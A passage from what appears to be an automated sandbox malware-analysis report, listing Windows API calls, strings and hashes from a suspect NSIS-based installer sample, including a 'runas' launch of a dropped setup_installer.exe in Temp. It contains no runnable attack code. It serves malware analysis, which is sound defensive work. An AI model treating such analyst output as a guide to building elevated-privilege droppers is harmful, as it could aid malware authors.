                                        • ShowWindow.USER32(00000000,00000005), ref: 0040305F
                                          • Part of subcall function 00402FAA: MulDiv.KERNEL32(00000000,00000064,003564E3), ref: 00402FBF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                        • String ID: ... %d%%
                                        • API String ID: 722711167-2449383134
                                        • Opcode ID: ab62b393791c357b2b7c3f13276244fc9b242bdab4121adb7888db3a09e72511
                                        • Instruction ID: a5f4734244b8f6f028ba4000c5489b7d2f6cf4b1dd98660c68856af7419d999b
                                        • Opcode Fuzzy Hash: ab62b393791c357b2b7c3f13276244fc9b242bdab4121adb7888db3a09e72511
                                        • Instruction Fuzzy Hash: 1D010470506211EBCB216F64EE0CEAA7B7CAB00B01B10047BF841F11E9DABC4545DB9E
                                        APIs
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E68
                                        • GetMessagePos.USER32 ref: 00404E70
                                        • ScreenToClient.USER32(?,?), ref: 00404E8A
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E9C
                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: Message$Send$ClientScreen
                                        • String ID: f
                                        • API String ID: 41195575-1993550816
                                        • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                        • Instruction ID: 8ba846b23e886e731abba7044b613a2dc07349659d22c8c6246ceab34d3a3da9
                                        • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                        • Instruction Fuzzy Hash: C0015E7190021DBADB00DBA4DD85FFEBBBCAF54711F10012BBB50B61C0D7B8AA058BA5
                                        APIs
                                        • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB6
                                        • GetLastError.KERNEL32 ref: 00405ACA
                                        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADF
                                        • GetLastError.KERNEL32 ref: 00405AE9
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A99
                                        • C:\Users\user\Desktop, xrefs: 00405A73
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                        • API String ID: 3449924974-2028306314
                                        • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                        • Instruction ID: 182fb86997ef6356dfbf0076fac1484c8d0c28c6014f2d3d8060d55cd567293f
                                        • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                        • Instruction Fuzzy Hash: 30010871D00619EADF019BA0C988BEFBFB8EF04315F00813AD545B6280D7789648CFA9
                                        APIs
                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
                                        • wsprintfW.USER32 ref: 00402F7D
                                        • SetWindowTextW.USER32(?,?), ref: 00402F8D
                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402F9F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: Text$ItemTimerWindowwsprintf
                                        • String ID: unpacking data: %d%%$verifying installer: %d%%
                                        • API String ID: 1451636040-1158693248
                                        • Opcode ID: 3624e717fbcf7ea6fd8cb3bfca044f62ca72f15282bbc00cb62a71a2cd90e3ed
                                        • Instruction ID: 618675c633d4cc4fa353176bd059bfe03840d53555a4d718e50652829a5d94b1
                                        • Opcode Fuzzy Hash: 3624e717fbcf7ea6fd8cb3bfca044f62ca72f15282bbc00cb62a71a2cd90e3ed
                                        • Instruction Fuzzy Hash: 4CF01D7050020EABDF206F60DE4ABEA3B78EB00349F00803AFA15A51D0DBBD9559DB59
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
                                        • GlobalFree.KERNEL32(?), ref: 004029F0
                                        • GlobalFree.KERNEL32(00000000), ref: 00402A03
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                        • String ID:
                                        • API String ID: 2667972263-0
                                        • Opcode ID: d96938230be506bb3ce62f46d8dc11094feca3525b7110c1e5131bc4c1b7a030
                                        • Instruction ID: 7dc8c05146b407601171e0863837a653734e4b001a2a5e69b47689ac9694c0d9
                                        • Opcode Fuzzy Hash: d96938230be506bb3ce62f46d8dc11094feca3525b7110c1e5131bc4c1b7a030
                                        • Instruction Fuzzy Hash: 3121C171C00124BBDF216FA5DE49D9E7E79AF04364F10023AF964762E1CB794D419BA8
                                        APIs
                                        • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE0
                                        • wsprintfW.USER32 ref: 00404DE9
                                        • SetDlgItemTextW.USER32(?,00423748), ref: 00404DFC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: ItemTextlstrlenwsprintf
                                        • String ID: %u.%u%s%s$H7B
                                        • API String ID: 3540041739-107966168
                                        • Opcode ID: f073c4526331e437099308c9ea4f4727a83fc85bc9477a72d0d5fe05f0d32628
                                        • Instruction ID: 1eef4f6c404c38b42470a280790990b5f635bff36f5ff3debe150acb3f73a003
                                        • Opcode Fuzzy Hash: f073c4526331e437099308c9ea4f4727a83fc85bc9477a72d0d5fe05f0d32628
                                        • Instruction Fuzzy Hash: 59110873A0412837DB0065ADAC45EDE32989F81374F250237FE26F20D5EA78CD1182E8
                                        APIs
                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402E95
                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: CloseEnum$DeleteValue
                                        • String ID:
                                        • API String ID: 1354259210-0
                                        • Opcode ID: f62ab79c521e370d5556569303502529bbab9984cd7072d733bebeae98d4866a
                                        • Instruction ID: 5acf5ff44325b65ef2d3dead3dbb76990f04c91a4d0d8f72c78c18ffef5b4167
                                        • Opcode Fuzzy Hash: f62ab79c521e370d5556569303502529bbab9984cd7072d733bebeae98d4866a
                                        • Instruction Fuzzy Hash: 05215A71500109BBDF129F90CE89EEF7A7DEB54348F110076B905B11E0E7B48E54AAA8
                                        APIs
                                        • GetDlgItem.USER32(?,?), ref: 00401D9A
                                        • GetClientRect.USER32(?,?), ref: 00401DE5
                                        • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                        • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                        • DeleteObject.GDI32(00000000), ref: 00401E39
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                        • String ID:
                                        • API String ID: 1849352358-0
                                        • Opcode ID: 657c18a0f69634810084f7808af5fab3a58a396e011c15f602512883127771f4
                                        • Instruction ID: def1b01f8fd4f78887aa18ea50614605241407c0d84dd339e733dcfbebc98a92
                                        • Opcode Fuzzy Hash: 657c18a0f69634810084f7808af5fab3a58a396e011c15f602512883127771f4
                                        • Instruction Fuzzy Hash: 06212672A04119AFCB05CFA4DE45AEEBBB5EF08304F14403AF945F62A0C7389D51DB98
                                        APIs
                                        • GetDC.USER32(?), ref: 00401E51
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                        • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                        • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                        • String ID:
                                        • API String ID: 3808545654-0
                                        • Opcode ID: 94554544311ab2f32d1f9f235813ecd660138e8dc23dd7fc0019dd27f629f36f
                                        • Instruction ID: a76e2873b7558907f835798c96529171b27b16ad4d601dd46fbfe91b59f2db27
                                        • Opcode Fuzzy Hash: 94554544311ab2f32d1f9f235813ecd660138e8dc23dd7fc0019dd27f629f36f
                                        • Instruction Fuzzy Hash: F101D871900250EFEB005BB4EE89B9A3FB0AF15300F24893EF141B71E2C6B904459BED
                                        APIs
                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID: !
                                        • API String ID: 1777923405-2657877971
                                        • Opcode ID: faab02cff34b921551a1342022214cf29e3e194daab0830cb346dd63cd78f0b5
                                        • Instruction ID: 504b766b7349ebce22e5cc184c1b69e4e3709f4fc648736089561923f5a7a9d8
                                        • Opcode Fuzzy Hash: faab02cff34b921551a1342022214cf29e3e194daab0830cb346dd63cd78f0b5
                                        • Instruction Fuzzy Hash: C221AD7195420AAEEF05AFB4D94AAAE7BB0EF44304F10453EF601B61D1D7B84941CB98
                                        APIs
                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004035C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405E17
                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004035C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405E21
                                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405E33
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E11
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrcatlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 2659869361-3081826266
                                        • Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                        • Instruction ID: be8ecf20d8ded769d30575e1df7d92fadfde1fb70814d4249ac81525444b4036
                                        • Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                        • Instruction Fuzzy Hash: 4DD0A7311029347AC2117B489C08CDF62ACAE96300341043BF142B30A4C77C5E5287FD
                                        APIs
                                          • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
                                          • Part of subcall function 00405EBC: CharNextW.USER32(?,?,00425F50,?,00405F30,00425F50,00425F50,74DF3420,?,74DF2EE0,00405C6E,?,74DF3420,74DF2EE0,00000000), ref: 00405ECA
                                          • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405ECF
                                          • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405EE7
                                        • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,74DF3420,?,74DF2EE0,00405C6E,?,74DF3420,74DF2EE0,00000000), ref: 00405F72
                                        • GetFileAttributesW.KERNEL32(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,74DF3420,?,74DF2EE0,00405C6E,?,74DF3420,74DF2EE0), ref: 00405F82
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                        • String ID: P_B
                                        • API String ID: 3248276644-906794629
                                        • Opcode ID: 599bd04a1195b132cf6b260ce9cfa8fb39e22d36c0f4a850b99e9cc2c8b8c615
                                        • Instruction ID: 859fcd89679448da631e779a0da4808ed27405fda231041bc00783fb73730a7b
                                        • Opcode Fuzzy Hash: 599bd04a1195b132cf6b260ce9cfa8fb39e22d36c0f4a850b99e9cc2c8b8c615
                                        • Instruction Fuzzy Hash: 5DF0F925115D2325D722333A5D09AAF1544CF92358B49013FF895F22C1DA3C8A13CDBE
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 00405547
                                        • CallWindowProcW.USER32(?,?,?,?), ref: 00405598
                                          • Part of subcall function 004044DE: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F0
                                        Strings
                                        Similarity
                                        • API ID: Window$CallMessageProcSendVisible
                                        • String ID:
                                        • API String ID: 3748168415-3916222277
                                        • Opcode ID: e2a7228699b6e9b249c6dba5f8e9bb0c65ec33a27f8289b454cb53322165a19e
                                        • Instruction ID: 7ed895885fecbfe1028844bafe119d46ede1b6e58bfeef0b35ccd3d75cf6e938
                                        • Opcode Fuzzy Hash: e2a7228699b6e9b249c6dba5f8e9bb0c65ec33a27f8289b454cb53322165a19e
                                        • Instruction Fuzzy Hash: E60171B1200648BFDF208F11DD80A6B7726EB84755F244537FA007A1D4C77A8E529E59
                                        APIs
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422728,00000000,?,?,runas C:\Users\user\AppData\Local\Temp\setup_installer.exe,?,?,00406699,80000002), ref: 00406450
                                        • RegCloseKey.ADVAPI32(?,?,00406699,80000002,Software\Microsoft\Windows\CurrentVersion,runas C:\Users\user\AppData\Local\Temp\setup_installer.exe,runas C:\Users\user\AppData\Local\Temp\setup_installer.exe,runas C:\Users\user\AppData\Local\Temp\setup_installer.exe,00000000,00422728), ref: 0040645B
                                        Strings
                                        • runas C:\Users\user\AppData\Local\Temp\setup_installer.exe, xrefs: 00406411
                                        Similarity
                                        • API ID: CloseQueryValue
                                        • String ID: runas C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                        • API String ID: 3356406503-1539586198
                                        • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                        • Instruction ID: f0f89c662eeec8a22638327002db2d2d8046b3273e4fa87c0bc9f0af31e9764c
                                        • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                        • Instruction Fuzzy Hash: E1017172510209EBDF218F51CC05FDB3BB8EB54354F01403AFD55A2190D738D964DB94
                                        APIs
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,Error launching installer), ref: 00405B4E
                                        • CloseHandle.KERNEL32(?), ref: 00405B5B
                                        Strings
                                        • Error launching installer, xrefs: 00405B38
                                        Similarity
                                        • API ID: CloseCreateHandleProcess
                                        • String ID: Error launching installer
                                        • API String ID: 3712363035-66219284
                                        • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                        • Instruction ID: 4727b597e06a80ccf73fde1317b74bfd1e446cf8a7cb79422ce9438d985acd26
                                        • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                        • Instruction Fuzzy Hash: 2FE0B6B4A00209BFEB109B64ED49F7B7BBDEB04648F414465BD50F6190D778A8158A7C
                                        APIs
                                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030D4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe,C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe,80000000,00000003), ref: 00405E63
                                        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030D4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe,C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe,80000000,00000003), ref: 00405E73
                                        Strings
                                        Similarity
                                        • API ID: CharPrevlstrlen
                                        • String ID: C:\Users\user\Desktop
                                        • API String ID: 2709904686-224404859
                                        • Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                        • Instruction ID: 42216084ebed45f2f1fcdcce66f7b00f69915d90115442600aae12f46dcfca4c
                                        • Opcode Fuzzy Hash: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                        • Instruction Fuzzy Hash: 65D05EB2401D209AC3226718DD04DAF73ACEF5134074A482AE582A61A4D7785E8186E8
                                        APIs
                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA7
                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBF
                                        • CharNextA.USER32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD0
                                        • lstrlenA.KERNEL32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD9
                                        Similarity
                                        • API ID: lstrlen$CharNextlstrcmpi
                                        • String ID:
                                        • API String ID: 190613189-0
                                        • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                        • Instruction ID: a453383ccec69260e8b6b46741f5159dab33bedf04c15e844a7af63cc501478c
                                        • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                        • Instruction Fuzzy Hash: 02F06235105418EFD7029BA5DD40D9EBBA8DF06350B2540BAE840F7350D678DE01ABA9

                                        Execution Graph

                                        Execution Coverage: 16.4%
                                        Dynamic/Decrypted Code Coverage: 0%
                                        Signature Coverage: 0%
                                        Total number of Nodes: 2000
                                        Total number of Limit Nodes: 53
